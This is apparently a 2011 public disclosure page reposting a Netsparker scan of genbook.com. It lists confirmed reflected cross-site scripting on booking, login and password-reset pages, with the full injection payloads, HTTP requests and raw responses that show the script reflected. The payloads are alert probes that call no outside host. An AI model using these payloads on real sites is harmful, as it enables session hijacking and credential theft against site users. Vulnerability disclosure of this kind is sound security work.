XSS, Cross Site Scripting in genbook.com, CWE-79, CAPEC-86, DORK REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Bounty Hunting: NO BUGS = NO PAYMENT. Google Vulnerability Rewards Program as the example for payment terms and conditions.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, Google Hacking Database, DORK Search

CWE-79 XSS Crawler - XSS Engine
CWE-89 SQLi Crawler - SQLi Engine
CWE-113 HTTPi Crawler - HTTPi Engine
CWE-23 LFI, RFI Crawler - LFI, RFI Engine
Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.genbook.com/bookings/booknowjstag....
SCAN DATE
 4/25/2011 7:58:57 PM
REPORT DATE
 4/25/2011 8:07:53 PM
SCAN DURATION
 00:03:53

Total Requests

6268

Average Speed

26.80 req/sec.
15
identified
11
confirmed
0
critical
4
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
53 %
MEDIUM
7 %
LOW
13 %
INFORMATION
27 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html E-mail Address Disclosure No
/bookings/ Query Based QUERYSTRING Cross-site Scripting Yes
/bookings/booknowjstag.action bookingSourceId GET [Possible] Cross-site Scripting No
Cookie Not Marked As HttpOnly Yes
/bookings/images/ Apache Version Disclosure No
Forbidden Resource Yes
/bookings/slot/reservation/30010843 Query Based QUERYSTRING Cross-site Scripting Yes
/bookings/slot/reservation/30010918 Query Based QUERYSTRING Cross-site Scripting Yes
/bookings/slot/reservation/30010944 Query Based QUERYSTRING Cross-site Scripting Yes
/bookings/slot/reservation/30012013 Query Based QUERYSTRING Cross-site Scripting Yes
/manager/ Cookie Not Marked As Secure Yes
/manager/forgotpassword Query Based QUERYSTRING Cross-site Scripting Yes
/manager/login Query Based QUERYSTRING Cross-site Scripting Yes
/robots.txt Robots.txt Identified Yes
/sitemap.xml Sitemap Identified No
Cross-site Scripting

Cross-site Scripting
7 TOTAL
IMPORTANT
CONFIRMED
7
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /bookings/

/bookings/ CONFIRMED

http://www.genbook.com/bookings/?'"--></style></script><script>alert(0x000029)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000029)</script>

Request

GET /bookings/?'"--></style></script><script>netsparker(0x000029)</script> HTTP/1.1
Referer: http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=jjz2adntav7r.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:59 GMT
Server: Jetty(6.1.21)
Content-Type: text/html; charset=iso-8859-1
Cache-Control: no-cache
Pragma: no-cache
Expires: Sun, 01 Dec 1974 00:00:00 GMT
X-UA-Compatible: IE=7
Transfer-Encoding: chunked


<html><head><meta http-equiv="REFRESH" content="0; url=https://www.genbook.com/bookings/?'"--></style></script><script>netsparker(0x000029)</script>"/></head><body></body></html>
- /manager/forgotpassword

/manager/forgotpassword CONFIRMED

http://www.genbook.com/manager/forgotpassword?'"--></style></script><script>alert(0x00035C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00035C)</script>

Request

GET /manager/forgotpassword?'"--></style></script><script>netsparker(0x00035C)</script> HTTP/1.1
Referer: http://www.genbook.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=o1c1z4gqu1o3.bm2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:00:19 GMT
Server: Jetty(6.1.21)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 191
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 01:00:19 GMT
X-UA-Compatible: IE=7


<html><head><meta http-equiv="REFRESH" content="0; url=https://www.genbook.com/manager/forgotpassword?'"--></style></script><script>netsparker(0x00035C)</script>"/></head><body></body></html>
- /manager/login

/manager/login CONFIRMED

http://www.genbook.com/manager/login?'"--></style></script><script>alert(0x000476)</script>

Parameters

Parameter Type Value
os_cookie POST true
os_destination POST
os_password POST
os_username POST
Query Based QUERYSTRING '"--></style></script><script>alert(0x000476)</script>

Request

POST /manager/login?'"--></style></script><script>netsparker(0x000476)</script> HTTP/1.1
Referer: http://www.genbook.com/how-it-works/who-uses-genbook/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.genbook.com
Cookie: JSESSIONID=1o46gucz5aha3.bm2
Content-Length: 57
Accept-Encoding: gzip, deflate

os_cookie=true&os_destination=&os_password=&os_username=&

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:00:52 GMT
Server: Jetty(6.1.21)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 182
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 01:00:52 GMT
X-UA-Compatible: IE=7


<html><head><meta http-equiv="REFRESH" content="0; url=https://www.genbook.com/manager/login?'"--></style></script><script>netsparker(0x000476)</script>"/></head><body></body></html>
- /bookings/slot/reservation/30010944

/bookings/slot/reservation/30010944 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30010944?'"--></style></script><script>alert(0x0007..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000776)</script>

Request

GET /bookings/slot/reservation/30010944?'"--></style></script><script>netsparker(0x000776)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997986; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: CUSTOMER_COOKIE=194997987
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with Spa Evia in Everett, Washington</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =false;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with Spa Evia in Everett, Washington

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<img src="serviceprovider/30010944/logo" alt="Logo" width="128" height="78"/>
<h1 id="businessname">Spa Evia</h1>
<div id="businessaddress">8413 Xavier Way, Everett, WA 98012</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30010944?'"--></style></script><script>netsparker(0x000776)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30010944/reviews?'"--></style></script><script>netsparker(0x000776)</script>">Reviews (13)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Booking</div></div></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850255">Eyelash Extensions</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=989881">Customized Care</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850122">Facials</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=849918">Facial Waxing</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850166">Body Waxing</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850261">Add-on/ Extra's</a></li>
</ul>
</dd>
</dl>
<div id="services">

<a name="990015" class="servicecategory">Booking</a>
<dl>

















































<dt>
<a href="slot/reservation/30010944/990038?bookingContactId=194997987">When Booking</a>
</dt>
<dd>If you need more than once service. Write me a memo to add other services to your appointment. Make sure to click confirm, to finish booking your online appointment. Thanks!</dd>









<dt>
<a href="slot/reservation/30010944/39255402?bookingContactId=194997987">Contact Me</a>
</dt>
<dd>You can schedule several ways. Online booking, Email (hellen@spaevia.com), text me, or by phone. :) </dd>




</dl>









</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=47.845802307128906,-122.18824768066406(Spa Evia)&ll=47.845802307128906,-122.18824768066406&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">Spa Evia</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">8413 Xavier Way</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">Everett</span>, <span class="region" itemprop="region">WA</span> <span class="postal-code" itemprop="postal-code">98012</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://www.spaevia.net" target="_blank">http://www.spaevia.net</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>5:30pm - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>5:30pm - 7:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>5:30pm - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>9:00am - 2:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >

</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">Spa Evia</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">8413 Xavier Way</span>,&nbsp;
<span class="locality" itemprop="locality">Everett</span>,&nbsp;
<span class="region" itemprop="region">WA</span>&nbsp;
<span class="postal-code" itemprop="postal-code">98012</span>,
</span>
<a class="url" itemprop="url" href="http://www.spaevia.net" target="_blank">http://www.spaevia.net</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="reviewer vcard"><span class="fn" itemprop="reviewer">Beth E</span></span>, <span class="dtreviewed" title="2011-01-23" itemprop="dtreviewed" datetime="2011-01-23">Jan 23, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">Hellen does a fabulous job taming my unruly eyebrows. She creates a relaxed atmosphere, is so efficient, and makes me feel at ease with her pleasant manner. I heartily recommend Hellen's services!</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30010944/reviews?'"--></style></script><script>netsparker(0x000776)</script>">Read all 13 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30010944");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30010944");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;
latLong=new GLatLng(47.845802307128906,-122.18824768066406);

window.setTimeout('setAddressDiv("8413 Xavier Way, Everett, WA 98012", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>


<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>

<script>
COMSCORE.beacon({
c1:2,
c2:7517143,
c3:"",
c4:"",
c5:"",
c6:"",
c15:""
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7517143&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->
</body>
</html>
- /bookings/slot/reservation/30010918

/bookings/slot/reservation/30010918 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30010918?'"--></style></script><script>alert(0x0007..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00077B)</script>

Request

GET /bookings/slot/reservation/30010918?'"--></style></script><script>netsparker(0x00077B)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997986; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: CUSTOMER_COOKIE=194997989
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with New Beginnings Skin Care &amp; Massage in Carson City, Nevada</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =false;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with New Beginnings Skin Care & Massage in Carson City, Nevada

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<h1 id="businessname">New Beginnings Skin Care &amp; Massage</h1>
<div id="businessaddress">343 Fairview Drive #205, Carson City, NV 89701</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30010918?'"--></style></script><script>netsparker(0x00077B)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30010918/reviews?'"--></style></script><script>netsparker(0x00077B)</script>">Reviews (36)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Spa Packages</div></div></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=835671">Facials</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=117800859">Image Skin Peels</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=116953788">Microdermabrasion</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=835686">Massage Therapy</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=835715">Body Sugaring</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=1588936">Body Treatments</a></li>
</ul>
</dd>
</dl>
<div id="services">


<a name="859802" class="servicecategory">Spa Packages</a>
<dl>












































































<dt>
<a href="slot/reservation/30010918/1576487?bookingContactId=194997989">Refresh Spa - $130.00</a>
</dt>
<dd>1 Hour Massage
1 Hour Signature European Facial
Eye Brow Sugaring
</dd>



<dt>
<a href="slot/reservation/30010918/2296746?bookingContactId=194997989">Begin Spa - $135.00</a>
</dt>
<dd>Quickly becoming everyones favorite! Combining New Beginnings Facial Journey, New Beginnings Bare Foot Ritual, and Eyebrow Sugaring</dd>




















































<dt>
<a href="slot/reservation/30010918/119143082?bookingContactId=194997989">Rejuvenate - $130.00</a>
</dt>
<dd>Back Treatment (facial for the back with mud mask), and choose between Earth or Water Foot Ritual and eyebrow sugaring. (please note in comments which foot ritual you would like)</dd>






</dl>











</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=39.14991760253906,-119.76551818847656(New Beginnings Skin Care & Massage)&ll=39.14991760253906,-119.76551818847656&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">New Beginnings Skin Care &amp; Massage</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">343 Fairview Drive #205</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">Carson City</span>, <span class="region" itemprop="region">NV</span> <span class="postal-code" itemprop="postal-code">89701</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://www.newbeginningsskincare.com" target="_blank">http://www.newbeginningsskincare.com</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Mon</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Fri</div>
<div>9:00am - 5:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>9:00am - 3:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >

</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">New Beginnings Skin Care &amp; Massage</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">343 Fairview Drive #205</span>,&nbsp;
<span class="locality" itemprop="locality">Carson City</span>,&nbsp;
<span class="region" itemprop="region">NV</span>&nbsp;
<span class="postal-code" itemprop="postal-code">89701</span>,
</span>
<a class="url" itemprop="url" href="http://www.newbeginningsskincare.com" target="_blank">http://www.newbeginningsskincare.com</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="reviewer vcard"><span class="fn" itemprop="reviewer">Jamie Castle </span></span>, <span class="dtreviewed" title="2011-04-13" itemprop="dtreviewed" datetime="2011-04-13">Apr 13, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">Tami is great at everything. She is very knowledgeable about her products and services. She is very comfortable to be around and has great bedside manner.
I also love that I can book online!</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30010918/reviews?'"--></style></script><script>netsparker(0x00077B)</script>">Read all 36 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30010918");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30010918");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;
latLong=new GLatLng(39.14991760253906,-119.76551818847656);

window.setTimeout('setAddressDiv("343 Fairview Drive #205, Carson City, NV 89701", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>


<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>

<script>
COMSCORE.beacon({
c1:2,
c2:7517143,
c3:"",
c4:"",
c5:"",
c6:"",
c15:""
});
</script>
..
- /bookings/slot/reservation/30012013

/bookings/slot/reservation/30012013 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30012013?'"--></style></script><script>alert(0x0007..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00078C)</script>

Request

GET /bookings/slot/reservation/30012013?'"--></style></script><script>netsparker(0x00078C)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997995; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: CUSTOMER_COOKIE=194997996
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with Cloud Nine in oakland, California</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =true;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
